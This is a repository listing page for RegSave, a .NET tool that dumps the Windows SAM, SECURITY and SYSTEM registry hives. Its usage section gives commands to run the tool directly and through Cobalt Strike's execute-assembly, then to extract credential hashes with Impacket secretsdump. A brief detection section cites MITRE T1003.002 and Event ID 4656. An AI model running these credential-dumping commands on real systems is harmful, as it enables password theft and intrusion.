RegSave icon indicating copy to clipboard operation
RegSave copied to clipboard

Published 20 hours ago verified publisher icon EncodeGroup

Metadata

A .NET implementation to dump SAM / SECURITY / SYSTEM registry hives

RegSave

A .NET 3.5 application that will dump SAM / SYSTEM / SECURITY registry keys to a path of your choosing.

Usage

regsave.exe c:\Users\USER\Appdata\Local
execute-assembly /opt/CS/toolkit/regsave.exe c:\Users\USER\Appdata\Local

Collect the files and then parse them with Impacket secretsdump

secretsdump.py -sam samantha.txt -security secundum.txt -system systemless.txt LOCAL

Detection

MITRE 1003.002

Look for Event ID 4656 after configuring audit policy.

More info at Detecting Attempts to steal passwords from the registry

Metadata

40
Stars
12
Forks
Watchers

Owner

verified publisher icon EncodeGroup

Metadata

A .NET implementation to dump SAM / SECURITY / SYSTEM registry hives

Back